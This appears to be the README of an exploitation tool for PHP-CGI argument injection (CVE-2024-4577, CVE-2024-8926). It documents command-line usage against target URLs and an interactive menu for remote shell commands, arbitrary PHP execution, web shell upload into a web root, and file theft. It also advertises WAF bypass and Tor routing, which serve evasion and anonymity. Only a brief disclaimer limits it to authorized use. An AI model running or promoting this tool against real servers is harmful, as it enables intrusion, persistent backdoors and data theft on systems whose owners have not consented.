
一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具
🚀 CVE-2024-4577 & CVE-2024-8926 Outil d'exploitation
Outil automatisé de test pour la vulnérabilité d'injection de paramètres PHP-CGI, prenant en charge les CVE-2024-4577 et CVE-2024-8926, permettant des opérations telles que l'exécution de commandes, le téléchargement et le téléversement de fichiers.
Cet outil permet de tester la vulnérabilité d'injection de paramètres dans un environnement PHP-CGI et propose :
Cet outil est destiné uniquement aux tests légitimes et à des fins académiques. Ne l'utilisez pas sur des systèmes non autorisés !
⚠️ Toute utilisation illégale engage votre responsabilité juridique !
Cet outil est uniquement destiné à :
Cet outil dépend des packages Python suivants, veuillez d'abord les installer :
pip install -r requirements.txt
Ou les installer manuellement :
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
Exemples :
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
Lorsque le script trouve une vulnérabilité, il affiche le menu suivant :
╭──────────── Menu du mode Exploit ────────────╮
│ Cible actuelle : http://example.com/ │
│ Point d'injection actuel : /php-cgi/php-cgi.exe│
│ Identifiant de vulnérabilité : CVE-2024-4577 │
╰────────────────────────────────────────────────╯
1) 🧪 Mode Shell
2) 🛠️ Mode PHP personnalisé
3) 📤 Téléverser un fichier
4) 📥 Télécharger un fichier
5) 🎯 Changer de cible
6) ⚙️ Configurer les paramètres
7) ❌ Quitter le programme
>>
Exécute une commande système :
shell> whoami
📂 Sauvegarder la sortie
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
Exécute du code PHP personnalisé :
phpinfo();
EOF
📂 Sauvegarder la sortie
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
Chemin du fichier local : C:\test\shell.php
Chemin complet de destination :
[*] Chemin de téléversement défini automatiquement sur : C:/xampp/htdocs/shell.php
📂 Chemin spécifié manuellement
Chemin complet de destination : C:\xampp\php\shell.php
Chemin du fichier distant : C:\xampp\htdocs\index.php
📂 Le fichier téléchargé est sauvegardé dans download/ ; en cas de doublon, un numéro est ajouté automatiquement
[*] Téléchargement terminé, sauvegardé sous download/index.php
Saisissez la nouvelle URL cible : http://newtarget.com
🔹 Un nouveau test de vulnérabilité sera effectué
[⚙️ Menu de configuration des paramètres d'exploitation]
1) Changer payload 1
2) Module bypass Non sélectionné
3) Temps d'attente (Timeout) 10 secondes
4) Délai des requêtes (Delay) 0 seconde
5) Enregistrement automatique (Log) Désactivé
6) Mode détaillé (Verbose) Désactivé
7) Effets d'animation (Effects) Activé
8) Mode forcé (Force) Désactivé
9) Sauvegarder et retourner au menu Exploit
Les stratégies de contournement suivantes sont disponibles :
php://input par d'autres formes| Paramètre | Description | Exemple |
|---|
-u , --url | Spécifie l'URL cible | -u http://example.com |
--timeout sec | Définit le délai d'expiration de la requête (0 = infini) | --timeout 30 |
--log | Enregistre automatiquement les commandes shell | --log |
--payload | Spécifie ou personnalise la combinaison de payloads | --payload 2 |
--tor | Envoie les requêtes via Tor | --tor |
--verbose | Affiche les messages détaillés | --verbose |
--bypass | Active le mode de contournement WAF | --bypass |
--force | Force l'entrée en mode exploitation | --force |
--cgipoint PATHS | Spécifie des chemins CGI particuliers à tester | --cgipoint /path |
--delay sec | Délai en secondes entre chaque requête | --delay 1.5 |
--no-effects | Désactive toutes les animations et les délais | --no-effects |